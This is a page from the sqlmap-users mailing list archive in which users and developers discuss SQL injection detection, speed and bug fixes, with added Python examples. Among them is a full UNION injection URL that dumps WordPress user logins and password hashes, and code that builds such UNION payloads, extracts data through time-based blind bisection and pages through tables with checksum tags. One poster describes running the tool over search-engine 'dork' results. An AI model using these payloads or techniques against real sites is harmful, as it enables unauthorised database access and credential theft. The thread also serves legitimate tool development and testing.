sqlmap-users Mailing List for sqlmap (Page 82)
Brought to you by: inquisb
From: This L. <thi...@ho...> - 2011-08-17 21:10:11

sqlmap/1.0-dev (r4351) found this:

Place: GET
Parameter: id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=155 AND SLEEP(5)-- 
---
web application technology: Apache, PHP 5.2.8
back-end DBMS: MySQL 5.0.11
banner: '5.0.77'

but the exploit was agonizingly slow. Testing each other individual technique (--technique=BEUS) at default level and risk produced no positives.

mysqlat0r found what it terms 'method get, with single parameter, numerical without comments' positive and could quickly catalog dbs and dump full tables. Here is an example of its exploit URL:

http://127.0.0.1/news/edumacation/salsandvinablals/2011/individittiual09.php?id=-666%20UNION%20ALL%20SELECT%20null,concat(0x585858535441525444554D50585858,ID,0x7C7C7C,user_login,0x7C7C7C,user_pass,0x7C7C7C,user_nicename,0x7C7C7C,user_email,0x7C7C7C,user_url,0x7C7C7C,user_registered,0x7C7C7C,user_activation_key,0x7C7C7C,user_status,0x7C7C7C,display_name,0x7C7C7C,0x585858454E4444554D50585858),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20redridinghood_OSyummy2k11.wp_users%20LIMIT%200,10&

Full source for mysqlat0r is available here: http://www.scrt.ch/en/attack/downloads/mini-mysqlat0r

My previous experience has been that mysqlat0r is only able to exploit what it claims to have found about 10% of the time.

It would be nice if sqlmap would continue to test the other techniques even after finding a positive, and show you a list of available positives in subsequent passes, as some are much faster or have better features, particularly when processing a dork resultset. I have seen it ask if I want to continue after a positive, but it doesn't seem to actually attempt each of the other techniques; it just skips to the next result set item. I'll retest that. I have been able to force it with the BEUST flags and select the preferred one at runtime, but the UI for doing so is a little clumsy.
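
The reason the UNION vector mysqlat0r found is so much faster than sqlmap's time-based one is visible in the URL above: every row is wrapped between the hex literals 0x585858535441525444554D50585858 ('XXXSTARTDUMPXXX') and 0x585858454E4444554D50585858 ('XXXENDDUMPXXX'), columns are joined with 0x7C7C7C ('|||'), and a single HTTP response carries ten whole rows that the client only has to cut out of the page. The Python below is an added example written for this page (not code from sqlmap or mysqlat0r): it rebuilds that payload from a column list and the 22-column width of the original SELECT, shown before URL-encoding, and parses rows out of a constructed HTML body. The column names and table come from the URL above; the sample response, the 'hash1'/'hash2' values and the row with too few cells are constructed for the example.

```python
import re
from typing import Dict, List

# Delimiters used by the mysqlat0r URL in the message above (sent as MySQL 0x... literals).
START_MARK = "XXXSTARTDUMPXXX"
END_MARK = "XXXENDDUMPXXX"
COL_SEP = "|||"


def hexlit(s: str) -> str:
    """Encode a string as a MySQL 0x... literal so the payload needs no quote characters."""
    return "0x" + s.encode().hex().upper()


def build_union_payload(columns: List[str], table: str, total_cols: int,
                        inject_col: int = 2, limit: int = 10, offset: int = 0) -> str:
    """Value for the injectable numeric parameter, before URL-encoding.

    total_cols is the column count of the original SELECT (22 in the URL above);
    inject_col is the 1-based position that is reflected in the page. Every other
    position is padded with null, exactly as the URL does.
    """
    sep = "," + hexlit(COL_SEP) + ","
    concat = "concat(" + hexlit(START_MARK) + "," + sep.join(columns) + "," + hexlit(END_MARK) + ")"
    cells = ["null"] * total_cols
    cells[inject_col - 1] = concat
    return f"-666 UNION ALL SELECT {','.join(cells)} FROM {table} LIMIT {offset},{limit}"


_ROW = re.compile(re.escape(START_MARK) + r"(.*?)" + re.escape(END_MARK), re.S)


def parse_rows(body: str, columns: List[str]) -> List[Dict[str, str]]:
    """Cut every marker-delimited row out of the page and map its cells to column names."""
    rows = []
    for chunk in _ROW.findall(body):
        cells = chunk.split(COL_SEP)
        if len(cells) != len(columns):
            # Truncated or HTML-mangled row: skip it rather than misalign the columns.
            continue
        rows.append(dict(zip(columns, cells)))
    return rows


# Constructed sample response (not a real capture): the UNION is reflected in the page's
# second column, one row per <p>; the third row is deliberately short.
SAMPLE_BODY = (
    "<html><body><h1>News</h1>"
    "<p>XXXSTARTDUMPXXX1|||admin|||hash1|||admin|||admin@example.invalidXXXENDDUMPXXX</p>"
    "<p>XXXSTARTDUMPXXX2|||editor|||hash2|||editor|||ed@example.invalidXXXENDDUMPXXX</p>"
    "<p>XXXSTARTDUMPXXX3|||brokenXXXENDDUMPXXX</p>"
    "</body></html>"
)
SAMPLE_COLUMNS = ["ID", "user_login", "user_pass", "user_nicename", "user_email"]

if __name__ == "__main__":
    print(build_union_payload(SAMPLE_COLUMNS, "redridinghood_OSyummy2k11.wp_users", 22))
    for row in parse_rows(SAMPLE_BODY, SAMPLE_COLUMNS):
        print(row)
```

Ten rows per request against the one bit per request of a time-based oracle is the whole speed difference; the price is that the page must reflect a selected column unmodified, which is why the parser drops any row whose cell count is off instead of guessing.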
From: Miroslav S. <mir...@gm...> - 2011-08-16 06:55:13

hi Oso.

there are some cases where character validation could cause problems like the one you've noticed. i won't go into details. with the last revision (r4349) there should be a better way to handle this kind of cases. there will be 5 validation retries (incrementing time delay along the run) and if each of those retries fails the last known value will be used as the final one (best solution for many reasons, including: it has the best probability to be "better" than the others; there is a great possibility - like in your case - that for some unknown reason there is a problem with the "validation" itself, with the probably good value being infinitely revalidated for no reason).

kr

On Tue, Aug 16, 2011 at 6:11 AM, Oso Dog <oso...@ya...> wrote:
> Hi there, I am a new user of sqlmap and have run into a situation where sqlmap
> indicates that it has found an injection point of a GET query parameter
> using "Oracle AND time-based blind (heavy query - comment)". I am able to use
> the brute force method to enumerate the column names of a table but when I
> try to do any other enumeration function, I get the following error
> messages. I have used both my home and work network plus 2 different systems
> and am using the most recent version from svn.
> [ERROR] invalid character detected. retrying..
> [WARNING] increasing time delay to 2 seconds (due to invalid char)
> I have let it run over night with the delay going up to 300 seconds but
> still no luck. I am trying to figure out exactly what is causing this error
> condition and if there is anything I can do on my end to resolve it? I have
> also tried using the --text-only parameter.
> thx.
> O.
> ------------------------------------------------------------------------------
> uberSVN's rich system and user administration capabilities and model
> configuration take the hassle out of deploying and managing Subversion and
> the tools developers use with it. Learn more about uberSVN and get a free
> download at: http://p.sf.net/sfu/wandisco-dev2dev
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
Miroslav Stampar (@stamparm)
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
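
The retry logic Miroslav describes, as an added simulation (example code written for this page, not sqlmap's own implementation): each character is recovered from a time-based oracle by bisection on ORD(), then confirmed with an equality question; a failed confirmation is logged, the delay grows and the character is bisected again, up to five validations in all, after which the last bisected value is kept. SimulatedTimeOracle, the secret 'ora$', the single glitched probe and the validation that can never succeed for '$' are all assumptions, chosen to reproduce the two situations in the thread: a genuinely wrong character that a retry corrects, and a correct one that validation refuses to confirm.

```python
import re
import time
from typing import Callable, List, Optional

SECRET = "ora$"  # constructed value held by the simulated DBMS

Ask = Callable[[str], bool]  # "is this SQL condition true?", judged from the response delay


class SimulatedTimeOracle:
    """Stand-in for the DBMS behind a time-based blind injection (assumption for this example).

    Conditions look like ORD(SUBSTR(secret,<pos>,1))<op><n> with <op> '>' (bisection probe)
    or '=' (validation). Two faults are simulated:
      * the very first bisection probe is answered False regardless (a delayed response
        that was not observed, as happens on a bad link);
      * validation never succeeds for characters in `unvalidatable`, mirroring the
        "probably good value being infinitely revalidated" case from the reply above.
    """

    _COND = re.compile(r"ORD\(SUBSTR\(secret,(\d+),1\)\)([>=])(\d+)")

    def __init__(self, secret: str, glitch_first_probe: bool = True, unvalidatable: str = "$"):
        self.secret = secret
        self.glitch_pending = glitch_first_probe
        self.unvalidatable = unvalidatable
        self.requests = 0

    def ask(self, condition: str) -> bool:
        self.requests += 1
        m = self._COND.fullmatch(condition)
        assert m, f"unsupported condition: {condition}"
        pos, op, n = int(m.group(1)), m.group(2), int(m.group(3))
        ch = self.secret[pos - 1]
        if op == ">":
            if self.glitch_pending:
                self.glitch_pending = False
                return False
            return ord(ch) > n
        if ch in self.unvalidatable:
            return False
        return ord(ch) == n


def bisect_char(ask: Ask, pos: int, lo: int = 32, hi: int = 126) -> int:
    """Binary-search ORD() of one character using 'greater than' probes only."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(f"ORD(SUBSTR(secret,{pos},1))>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(ask: Ask, length: int, max_retries: int = 5,
            sleeper: Callable[[int], None] = time.sleep,
            log: Optional[List[str]] = None) -> str:
    """Recover `length` characters, validating each one with an equality probe.

    A failed validation is logged, the delay is raised and the character is bisected
    again; after `max_retries` failures the last bisected value is accepted as-is
    (the r4349 behaviour described in the reply above).
    """
    out = []
    for pos in range(1, length + 1):
        delay = 1
        code = bisect_char(ask, pos)
        for attempt in range(1, max_retries + 1):
            if ask(f"ORD(SUBSTR(secret,{pos},1))={code}"):
                break
            if log is not None:
                log.append(f"pos {pos}: invalid character detected, retry {attempt}, delay {delay}s")
            if attempt < max_retries:
                sleeper(delay)
                delay += 1
                code = bisect_char(ask, pos)
        out.append(chr(code))
    return "".join(out)


if __name__ == "__main__":
    events: List[str] = []
    oracle = SimulatedTimeOracle(SECRET)
    value = extract(oracle.ask, len(SECRET), sleeper=lambda s: None, log=events)
    print(value, f"{oracle.requests} requests", *events, sep="\n")
```

Run as-is, position 1 is first bisected to 'O' (the glitched probe), fails validation once and is corrected on the retry; position 4 is bisected to the right '$' every time, never validates, and is kept after the fifth failure. That fallback is the whole point: without it the loop would keep raising the delay forever, which is what the 300-second runs in the original report look like.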
From: Miroslav S. <mir...@gm...> - 2011-08-16 06:15:51

hi Alex.

thank you for your report. find it "patched" in the latest revision (r4347).

kr

On Mon, Aug 15, 2011 at 3:11 AM, Alex <m3...@gm...> wrote:
> [WARNING] unknown charset '{charset}'. Please report by e-mail to
> sql...@li...
>
> from url http://pp24.biz/?mod=login

--
Miroslav Stampar (@stamparm)
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Miroslav S. <mir...@gm...> - 2011-08-16 06:11:59

hi anonymous anonymous.

thank you for your report. find it fixed in the latest revision (r4346).

kr

2011/8/16 anonymous anonymous <tm...@2c...>:
> [00:47:49] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4345), retry
> your run with the latest development version from the Subversion repository.
> If the exception persists, please send by e-mail to
> sql...@li... the following text and any information
> required to reproduce the bug. The developers will try to reproduce the bug,
> fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r4345)
> Python version: 2.6.6
> Operating system: posix
> Command line: ./sqlmap.py -u ************************************************************************************* --threads 50 -D **** -T ******* --columns
> Technique: ERROR
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 86, in main
>     start()
>   File "/root/sqlmap/lib/controller/controller.py", line 561, in start
>     action()
>   File "/root/sqlmap/lib/controller/action.py", line 100, in action
>     conf.dumper.dbTableColumns(conf.dbmsHandler.getColumns())
>   File "/root/sqlmap/lib/core/dump.py", line 214, in dbTableColumns
>     maxlength1 = max(maxlength1, len(column))
> TypeError: object of type 'NoneType' has no len()
> [*] shutting down at 00:47:49

--
Miroslav Stampar (@stamparm)
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Oso D. <oso...@ya...> - 2011-08-16 04:14:33

Hi there, I am a new user of sqlmap and have run into a situation where sqlmap indicates that it has found an injection point of a GET query parameter using "Oracle AND time-based blind (heavy query - comment)". I am able to use the brute force method to enumerate the column names of a table but when I try to do any other enumeration function, I get the following error messages. I have used both my home and work network plus 2 different systems and am using the most recent version from svn.

[ERROR] invalid character detected. retrying..
[WARNING] increasing time delay to 2 seconds (due to invalid char)

I have let it run over night with the delay going up to 300 seconds but still no luck. I am trying to figure out exactly what is causing this error condition and if there is anything I can do on my end to resolve it? I have also tried using the --text-only parameter.

thx.
O.
From: anonymous a. <tm...@2c...> - 2011-08-15 22:50:44

[00:47:49] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4345), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4345)
Python version: 2.6.6
Operating system: posix
Command line: ./sqlmap.py -u ************************************************************************************* --threads 50 -D **** -T ******* --columns
Technique: ERROR
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 86, in main
    start()
  File "/root/sqlmap/lib/controller/controller.py", line 561, in start
    action()
  File "/root/sqlmap/lib/controller/action.py", line 100, in action
    conf.dumper.dbTableColumns(conf.dbmsHandler.getColumns())
  File "/root/sqlmap/lib/core/dump.py", line 214, in dbTableColumns
    maxlength1 = max(maxlength1, len(column))
TypeError: object of type 'NoneType' has no len()
[*] shutting down at 00:47:49
From: Alex <m3...@gm...> - 2011-08-15 01:11:14

[WARNING] unknown charset '{charset}'. Please report by e-mail to sql...@li...

from url http://pp24.biz/?mod=login
From: Miroslav S. <mir...@gm...> - 2011-08-12 12:29:24

hi.

i've done some internal tests against r4000, r4300 & r4333. there is virtually no difference between r4300 and r4333 in terms of speed and they are significantly faster than r4000. could somebody give a full command line used and technique involved (i've tested against partial/full UNION and ERROR) that is causing "slow down"?

kr

On Thu, Aug 11, 2011 at 11:57 PM, <and...@gm...> wrote:
> Sirs,
>
> I have checked out the last commit and made some tests.
>
> It seems that this release is slower than the previous one.
>
> I'm dumping data from databases. The behavior is the same for mssql and mysql.
>
> Andre Silva
>
>
> -----Original Message-----
> From: Miroslav Stampar <mir...@gm...>
> Date: Thu, 11 Aug 2011 22:11:30
> To: Liran Mimoni<rea...@gm...>
> Cc: <sql...@li...>
> Subject: Re: [sqlmap-users] r4333 - sqlmap tests are now slower?

--
Miroslav Stampar (@stamparm)
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: <and...@gm...> - 2011-08-11 21:56:01

Sirs,

I have checked out the last commit and made some tests.

It seems that this release is slower than the previous one.

I'm dumping data from databases. The behavior is the same for mssql and mysql.

Andre Silva

-----Original Message-----
From: Miroslav Stampar <mir...@gm...>
Date: Thu, 11 Aug 2011 22:11:30
To: Liran Mimoni<rea...@gm...>
Cc: <sql...@li...>
Subject: Re: [sqlmap-users] r4333 - sqlmap tests are now slower?
From: Vladimir R. <rut...@gm...> - 2011-08-11 20:47:54

Hello, Miroslav!

On Wed., 2011-08-10 at 10:48 +0200, Miroslav Stampar wrote:
> Hi Vladimir.
>
> Thank you for your report. We'll do something about it. In the mean
> time you can experiment with --technique (other than U) or
> --start/--stop.
>
> If there is no alternative please contact me privately and i'll make
> you a temporary patch.
>
> That idea with end char is great. We'll try to use it in detection
> phase.
>
> Kr
>
> On 9.8.2011. 22:34, "Vladimir Rutsky" <rut...@gm...>
> wrote:
>

Thank you for the fast reply!

I managed to get the required information without using sqlmap, so a temporary patch is not needed; let my letter be a feature request for future versions of sqlmap.

In my case using --start/--stop helped a little --- when I provide such options it looks like sqlmap obtains the requested rows one by one, so the limit in the PHP script of 10 items per page is never reached. But anyway sqlmap incorrectly obtains not more than 10 columns from the table, so I can't get a full table dump with it.

Below I assume that we are using the UNION-SELECT technique.

1. How about, along with each item obtained from the database through SQL injection, also passing a checksum for that value. UNION-SELECT-technique SQL injection by its nature gives the ability to obtain values from the database as text --- because HTTP transfers text, so you can apply any checksum to that text. I suggest requesting the value through SQL injection as follows (for MySQL):

UNION SELECT CONCAT( "start tag", CAST(xxx AS CHAR), MD5(CAST(xxx AS CHAR)), "end tag")

Then if the obtained result contains text with a valid checksum between the start and end tags, the output is definitely not corrupted or truncated.

2. I saw that in MySQL queries you use a lot of "CONCAT(CHAR(58,46,121,118,58), ..." constructions. You can reduce their length by using hexadecimal representations of strings in MySQL, like "CONCAT(0x3a2e79763a, ...".

3. I looked through xml/payloads.xml and didn't find prefixes for simple WHERE clause inclusions on a PHP-powered host with magic_quotes_gpc enabled [1]. Consider the example (PHP and MySQL):

mysql_query("SELECT a,b,c FROM table WHERE name='" . $_GET["id"] . "'");

When a single quote is passed through GET it is escaped: "'" -> "\'". To work around such escaping it is enough to use the "\'" prefix in sqlmap: "\'" -> "\\'". I suggest using "\'" prefixes in sqlmap along with "'" prefixes.

[1] http://php.net/manual/en/security.magicquotes.php

4. I tried to get familiar with the source code of sqlmap, but despite it being written in Python it is quite hard to read and understand without learning the main idea and methods that are used in sqlmap. Is there any developer documentation?

Doing SQL injection is an art in some sense. So sqlmap will never be able to automatically hack every vulnerable site (but will help in most of them). I think sqlmap should provide an extendable and easy to use library, divided into several independent modules, like a module for testing a URL for vulnerabilities, a module for fetching data from a foreign database when a "vector" for obtaining a single item from the database is found, and so on.

P.S. I'm new to sqlmap and probably some of my thoughts described below don't make sense in the context of this project, or some of my ideas are already implemented. Hope this letter will be useful.

Best wishes,
Vladimir Rutsky
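
Points 1 and 2 above, together with the end-mark idea from Vladimir's original message, as an added example (written for this page, not sqlmap code): the injected value ships each item as start tag, CAST(x AS CHAR), MD5 of that same text, end tag, uses 0x... literals instead of CHAR(...) lists, and appends one more UNION branch carrying a sentinel row. On the client, verify_page() keeps only values whose MD5 matches and reports whether the sentinel arrived; a missing sentinel is exactly the 10-item page cap from the original message. The tag strings, the sentinel text, the three-column layout (the '1,2,3' of the original example) and the two stand-ins for MySQL and for list.php are assumptions, and nothing is sent over the network. One caveat the thread does not spell out: a plain UNION gives no ordering guarantee, so the sentinel check relies on MySQL returning the branches in order, which it does in practice when no ORDER BY is present.

```python
import hashlib
import re
from typing import List, Tuple

# Tag strings are assumptions for this example; any text absent from the page will do.
START_TAG, END_TAG = ":st:", ":en:"
SENTINEL = "ALLROWSRECEIVED"


def hexlit(s: str) -> str:
    """MySQL 0x... literal, the shorter form suggested in point 2 instead of CHAR(...)."""
    return "0x" + s.encode().hex()


def build_injection(column: str, table: str, limit: int, offset: int = 0, columns: int = 3) -> str:
    """Injected value for list.php?filter= (prefix "' " and suffix " -- " as in the thread).

    Each value travels as start|value|MD5(value)|end; a final UNION branch adds a sentinel
    row that can only be seen if the page echoed every row of the first branch.
    """
    v = f"CAST({column} AS CHAR)"
    pad = "".join(f",{i}" for i in range(2, columns + 1))  # columns 2..N, like "UNION SELECT 1,2,3"
    return (f"' UNION (SELECT CONCAT({hexlit(START_TAG)},{v},MD5({v}),{hexlit(END_TAG)}){pad} "
            f"FROM {table} LIMIT {offset},{limit}) "
            f"UNION (SELECT {hexlit(SENTINEL)}{pad}) -- ")


# value, then exactly 32 hex digits of MD5, then the end tag
_ITEM = re.compile(re.escape(START_TAG) + r"(.*?)([0-9a-f]{32})" + re.escape(END_TAG), re.S)


def verify_page(body: str) -> Tuple[List[str], int, bool]:
    """Return (values whose checksum matches, number of corrupted values, sentinel seen).

    A missing sentinel means the page cut the result short, so the caller should
    request the next slice by moving `offset` on rather than trust the row count.
    """
    good, bad = [], 0
    for value, digest in _ITEM.findall(body):
        if hashlib.md5(value.encode()).hexdigest() == digest:
            good.append(value)
        else:
            bad += 1
    return good, bad, SENTINEL in body


# --- constructed stand-ins for the DBMS and for the vulnerable list.php (not real captures) ---

def simulate_db_rows(values: List[str]) -> List[str]:
    """What MySQL would evaluate the CONCAT/MD5 branch to, followed by the sentinel row."""
    rows = [START_TAG + v + hashlib.md5(v.encode()).hexdigest() + END_TAG for v in values]
    return rows + [SENTINEL]


def render_page(rows: List[str], page_cap: int = 10) -> str:
    """list.php as described in the thread: prints only the first 10 rows, in PHP."""
    return "<ul>" + "".join(f"<li>{r}</li>" for r in rows[:page_cap]) + "</ul>"


if __name__ == "__main__":
    print(build_injection("table_name", "information_schema.tables", limit=9))
    # Ten rows plus the sentinel through a page that shows ten: the sentinel is lost.
    print(verify_page(render_page(simulate_db_rows([f"t{i}" for i in range(10)]))))
    # Nine rows plus the sentinel fit on the page: the slice is complete.
    print(verify_page(render_page(simulate_db_rows([f"t{i}" for i in range(9)]))))
```

With the sentinel in place the client can walk a table in slices of nine and stop when a slice arrives with the sentinel and fewer than nine values, without ever trusting the page's own row count; the per-value MD5 additionally rejects anything the application modified on its way out (escaping, truncation, HTML-encoding).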
From: Miroslav S. <mir...@gm...> - 2011-08-11 20:18:56

Hi.

Basically sqlmap should not have problems with these. There are two possible causes for symptoms like you've noticed. The first one is incompatibility of the charset encoding used by your console and the second one is the incompatibility of the backend data charset with the web page charset.

Three questions. What's the injection technique used, what's the charset of the injectable web page and have you tried opening the dumped CSV file with a text editor?

On 11.8.2011. 14:20, "root" <ro...@cn...> wrote:
> hi
> when i use sqlmap to check a chinese website and dump the data, i found sqlmap can't recognize Chinese characters, like this
>
>
> 2011-08-11
>
>
>
> thks&Best Regards
> robert
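
Miroslav's two explanations (console charset versus page charset, and backend data charset versus page charset) can be told apart offline. The Python below is an added example for this page, not sqlmap code: decode_body() trusts the charset the page declares only if the bytes decode cleanly under it and otherwise tries a few CJK fallbacks, while repair_mojibake() undoes the case where the dump was right but the console showed UTF-8 bytes as Latin-1 characters. The fallback list, the header and <meta> parsing and the two sample pages are assumptions constructed for the example.

```python
import re
from typing import Dict, Optional, Tuple

# Tried in this order when the declared charset does not decode the bytes cleanly.
# Assumption for this example: a Chinese site is most likely one of these.
FALLBACK_CHARSETS = ("utf-8", "gbk", "gb18030", "big5")

_HEADER_CHARSET = re.compile(r"charset=([\w-]+)", re.I)
_META_CHARSET = re.compile(rb"<meta[^>]+charset=[\"']?([\w-]+)", re.I)


def declared_charset(headers: Dict[str, str], body: bytes) -> Optional[str]:
    """The charset the page claims: Content-Type header first, then a <meta> tag."""
    m = _HEADER_CHARSET.search(headers.get("Content-Type", ""))
    if m:
        return m.group(1).lower()
    m = _META_CHARSET.search(body)
    return m.group(1).decode("ascii").lower() if m else None


def decode_body(headers: Dict[str, str], body: bytes) -> Tuple[str, str]:
    """Decode a response and report which charset actually worked.

    The declared charset is used only if the bytes decode under it without error
    (a page that says utf-8 but carries GBK rows from the database will not);
    otherwise the fallbacks are tried in order. Returns (text, charset_used).
    """
    candidates = []
    declared = declared_charset(headers, body)
    if declared:
        candidates.append(declared)
    candidates += [c for c in FALLBACK_CHARSETS if c not in candidates]
    for charset in candidates:
        try:
            return body.decode(charset), charset
        except (UnicodeDecodeError, LookupError):
            continue
    # Nothing decoded cleanly: keep the data and mark damaged bytes with U+FFFD.
    return body.decode("utf-8", errors="replace"), "unknown"


def repair_mojibake(text: str) -> str:
    """Undo the console-side mistake: UTF-8 bytes shown as Latin-1 characters
    (three junk characters per CJK character). Text that cannot have come
    through that path is returned unchanged."""
    try:
        return text.encode("latin-1").decode("utf-8")
    except (UnicodeEncodeError, UnicodeDecodeError):
        return text


# Constructed samples, not captures from the thread.
CJK = "\u4e2d\u6587"  # two Chinese characters
PAGE_DECLARES_UTF8_BUT_HOLDS_GBK = (b"<html><head><meta charset=utf-8></head><body>"
                                    + CJK.encode("gbk") + b"</body></html>")
PAGE_PLAIN_UTF8 = b"<html><body>" + CJK.encode("utf-8") + b"</body></html>"

if __name__ == "__main__":
    print(decode_body({}, PAGE_DECLARES_UTF8_BUT_HOLDS_GBK))
    print(decode_body({"Content-Type": "text/html; charset=utf-8"}, PAGE_PLAIN_UTF8))
    print(repair_mojibake(CJK.encode("utf-8").decode("latin-1")) == CJK)
```

If the first call reports 'gbk' although the page declares utf-8, the mismatch is between the database and the page (the second cause above); if the dumped CSV opens correctly in an editor but the terminal shows junk, it is the console (the first cause), and repair_mojibake() recovers the text.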
From: Miroslav S. <mir...@gm...> - 2011-08-11 20:11:38

Hi.

We've added one new generic union test (with %00 comment) as a default test. Maybe that's the reason for the 'slow' experience?

Kr

On 11.8.2011. 01:25, "Liran Mimoni" <rea...@gm...> wrote:
> I think that the tests that sqlmap is running on revision r4332 and r4333
> are much slower than older builds.
>
> is it just me? (hosts i'm testing are ping 20ms to me)
From: Liran M. <rea...@gm...> - 2011-08-10 23:25:02

I think that the tests that sqlmap is running on revision r4332 and r4333 are much slower than older builds.

is it just me? (hosts i'm testing are ping 20ms to me)
From: Bernardo D. A. G. <ber...@gm...> - 2011-08-10 09:31:28

The generic tests are always tested for. Regardless of the DBMS identified or --dbms switch provided.

Bernardo

2011/8/10 Andres Tarascó Acuña <ata...@gm...>:
> Hi,
> Is the "--dbms=db2" flag still unsupported ? I have tried it however
> the checked payloads were:
> [20:43:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [20:44:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
> [20:44:13] [INFO] testing 'Generic UNION query with Microsoft Access (%00) comment (NULL) - 1 to 10 columns'
> I'm not sure if this is currently a bug or just the expected result :?
> Thanks.
> Andres
> 2011/7/6 Bernardo Damele A. G. <ber...@gm...>
>>
>> Hi,
>>
>> Update on IBM DB2 support: payload for time-based has been added[1]
>> last week as well as support for direct connection (-d switch).
>>
>> [1] https://twitter.com/#!/sqlmap/status/85659702565937152
>>
>>
>> On 25 June 2011 11:04, Bernardo Damele A. G. <ber...@gm...> wrote:
>> > Hi,
>> >
>> > The long awaited IBM DB2 support has been implemented in sqlmap. The
>> > patch has been provided by Sebastian Bittig of r-tec IT Systeme GmbH
>> > and merged in sqlmap repository after some tweaking by us. It is very
>> > stable for both DB2 8.x and 9.x branches.
>> > The patch includes support to fingerprint and enumerate data on IBM
>> > DB2 via boolean-based blind SQL injection and UNION query SQL
>> > injection. Hopefully, soon someone will come up with a payload for
>> > time-based and error-based techniques too. Support for direct
>> > connection to the DBMS (-d switch) will be implemented soon as well.
>> >
>> > Thank you Sebastian and the rest of the team at r-tec for your patch
>> > and support!
>> >
>> > Sample run against an IBM DB2 9.7 test environment:
>> > --8<--
>> > $ python sqlmap.py -u http://TARGET/page.php?id=1 -f -b --current-user
>> >
>> > sqlmap/1.0-dev (r4182) - automatic SQL injection and database takeover tool
>> > http://sqlmap.sourceforge.net
>> >
>> > [!] legal disclaimer: usage of sqlmap for attacking targets without
>> > prior mutual consent is illegal. It is the end user's responsibility
>> > to obey all applicable local, state and federal laws. Authors assume
>> > no liability and are not responsible for any misuse or damage caused
>> > by this program
>> >
>> > [*] starting at 10:56:21
>> >
>> > [10:56:21] [INFO] using '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/TARGET/session' as session file
>> > [10:56:21] [INFO] testing connection to the target url
>> > [10:56:23] [INFO] heuristics detected web page charset 'ascii'
>> > [10:56:23] [INFO] testing if the url is stable, wait a few seconds
>> > [10:56:25] [INFO] url is stable
>> > [10:56:25] [INFO] testing if GET parameter 'id' is dynamic
>> > [10:56:26] [INFO] confirming that GET parameter 'id' is dynamic
>> > [10:56:26] [INFO] GET parameter 'id' is dynamic
>> > [10:56:27] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: DB2)
>> > [10:56:27] [INFO] testing sql injection on GET parameter 'id'
>> > [10:56:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>> > [10:56:32] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
>> > parsed error message(s) showed that the back-end DBMS could be DB2. Do you want to skip test payloads specific for other DBMSes? [Y/n]
>> > [10:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> > [10:56:49] [INFO] target url appears to be UNION injectable with 1 columns
>> > [10:56:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
>> > GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
>> > sqlmap identified the following injection points with a total of 21 HTTP(s) requests:
>> > ---
>> > Place: GET
>> > Parameter: id
>> > Type: boolean-based blind
>> > Title: AND boolean-based blind - WHERE or HAVING clause
>> > Payload: id=1' AND 7118=7118 AND 'Skhh'='Skhh
>> >
>> > Type: UNION query
>> > Title: Generic UNION query (NULL) - 1 to 10 columns
>> > Payload: id=1' UNION ALL SELECT CHR(58)||CHR(110)||CHR(114)||CHR(114)||CHR(58)||CHR(90)||CHR(103)||CHR(65)||CHR(88)||CHR(66)||CHR(109)||CHR(69)||CHR(74)||CHR(77)||CHR(117)||CHR(58)||CHR(101)||CHR(113)||CHR(108)||CHR(58) FROM SYSIBM.SYSDUMMY1-- AND 'QrLM'='QrLM
>> > ---
>> >
>> > [10:58:58] [INFO] testing IBM DB2
>> > [10:58:59] [INFO] confirming IBM DB2
>> > [10:59:12] [INFO] the back-end DBMS is IBM DB2
>> > web server operating system: Windows
>> > web application technology: PHP 5.3.5, Apache 2.2.17
>> > back-end DBMS: active fingerprint: IBM DB2 9.7
>> > html error message fingerprint: DB2
>> > [10:59:12] [INFO] fetching banner
>> > banner: 'DB2 v9.7.400.501'
>> >
>> > [10:59:13] [INFO] fetching current user
>> > current user: 'TEST'
>> > --8<--
>> >
>> > Bernardo
>> >
>> > --
>> > Bernardo Damele A. G.
>> > E-mail / Jabber: bernardo.damele (at) gmail.com
>> > Mobile: +447788962949 (UK 07788962949)
>> > PGP Key ID: Unavailable
>>
>> --
>> Bernardo Damele A. G.
>> E-mail / Jabber: bernardo.damele (at) gmail.com
>> Mobile: +447788962949 (UK 07788962949)
>> PGP Key ID: Unavailable

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
From: Andres T. A. <ata...@gm...> - 2011-08-10 09:30:01

Hi,
Is the "--dbms=db2" flag still unsupported ? I have tried it however the checked payloads were:

[20:43:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:44:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:44:13] [INFO] testing 'Generic UNION query with Microsoft Access (%00) comment (NULL) - 1 to 10 columns'

I'm not sure if this is currently a bug or just the expected result :?
Thanks.
Andres

